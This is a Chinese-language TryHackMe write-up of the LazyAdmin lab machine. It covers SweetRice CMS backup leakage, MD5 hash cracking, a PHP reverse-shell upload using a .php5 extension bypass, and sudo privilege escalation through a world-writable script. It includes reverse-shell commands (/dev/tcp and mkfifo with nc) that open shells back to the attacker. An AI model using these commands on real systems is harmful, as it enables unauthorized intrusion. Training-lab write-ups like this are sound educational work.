jayshalwala/TryHackMe---LazyAdmin-Writeup-

# TryHackMe - LazyAdmin **平台：** TryHackMe **难度：** 简单 **操作系统：** Linux **类别：** Web，权限提升 ## 概述 LazyAdmin 是一个适合初学者的 Linux 靶机，核心在于利用存在漏洞的 SweetRice CMS 安装程序。攻击链包括未经身份验证的备份文件泄露、从数据库转储中提取凭据、经过身份验证的 PHP 代码执行，以及通过全局可写脚本的 sudo 权限提升。 ## 侦察 ### 端口扫描 ``` nmap -sC -sV -oN nmap/initial 10.49.142.193 ``` 开放端口： - **22** - OpenSSH - **80** - Apache HTTP ### Web 枚举 ``` python3 dirsearch.py -u http://10.49.142.193 -e php,html -x 400,401,403 ``` 发现 `/content/` - 一个 SweetRice CMS 安装目录。 ## 漏洞利用 ### 步骤 1 - 备份泄露 SweetRice 将 MySQL 备份存储在一个公开可访问的目录中。无需身份验证。 ``` curl http://10.49.142.193/content/inc/mysql_backup/ ``` 下载 `.sql` 备份文件并从 `_options` 表中提取凭据： - **用户名：** `manager` - **密码哈希 (MD5)：** `42f749ade7f9e195bf475f37a44cafcb` ### 步骤 2 - 哈希破解 ``` hashcat -a 0 -m 0 42f749ade7f9e195bf475f37a44cafcb /usr/share/wordlists/rockyou.txt ``` 成功恢复明文密码。 ### 步骤 3 - 登录管理面板 导航至 SweetRice 管理面板： ``` http://10.49.142.193/content/as/ ``` 使用恢复的凭据登录。 ### 步骤 4 - 上传 PHP 反向 Shell 使用媒体中心上传了一个保存为 `shell.php5` 的 PHP 反向 Shell，以绕过扩展名过滤。 ``` & /dev/tcp//4444 0>&1'"); ?> ``` 启动监听器： ``` nc -lvnp 4444 ``` 触发 Shell： ``` http://10.49.142.193/content/attachment/shell.php5 ``` 获得了一个作为 `www-data` 用户的 Shell。从 `/home/itguy/user.txt` 中获取了 user flag。 ## 权限提升 ### Sudo 枚举 ``` sudo -l ``` 输出： ``` (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl ``` ### 检查 backup.pl ``` cat /home/itguy/backup.pl ``` 该脚本执行了 `/etc/copy.sh`。 ### 检查 copy.sh 权限 ``` ls -la /etc/copy.sh ``` 该文件是全局可写的。 ### 覆盖 copy.sh ``` echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 5555 >/tmp/f" > /etc/copy.sh ``` 启动监听器： ``` nc -lvnp 5555 ``` 通过 sudo 触发： ``` sudo /usr/bin/perl /home/itguy/backup.pl ``` 获得了一个 root Shell。从 `/root/root.txt` 中获取了 root flag。 ## 漏洞总结 | 漏洞 | 描述 | |---|---| | 备份泄露 | MySQL 备份在 `/content/inc/mysql_backup/` 暴露，无需身份验证 | | 弱凭据 | MD5 哈希密码可使用 rockyou.txt 破解 | | 无限制文件上传 | 媒体中心接受 `.php5` 文件，从而导致 RCE | | Sudo 错误配置 | `www-data` 用户可以使用 NOPASSWD 以 root 身份运行 `backup.pl` | | 全局可写脚本 | 由 `backup.pl` 调用的 `/etc/copy.sh` 可被任何用户写入 | ## 使用的工具 - nmap - dirsearch - hashcat - netcat ## Flag | Flag | 位置 | |---|---| | User | `/home/itguy/user.txt` | | Root | `/root/root.txt` |

标签：Apache, Bitdefender, CISA项目, CMS漏洞利用, CTF Writeup, Dirsearch, Hashcat, Hash爆破, LazyAdmin, Linux靶机, MD5破解, NC反弹Shell, Nmap, OpenSSH, Perl脚本提权, PHP一句话木马, SQL备份下载, Sudo提权, Sudo滥用, SweetRice CMS, TryHackMe, Webshell, Web安全, 世界可写文件提权, 信息泄露, 协议分析, 反弹Shell, 后台登录, 备份文件泄露, 大数据, 应用安全, 弱口令, 数据库拖库, 数据泄露, 文件上传漏洞, 权限提升, 目录扫描, 网络安全, 网络安全实验, 蓝队分析, 虚拟驱动器, 限制后缀绕过, 隐私保护, 靶机Writeup, 默认口令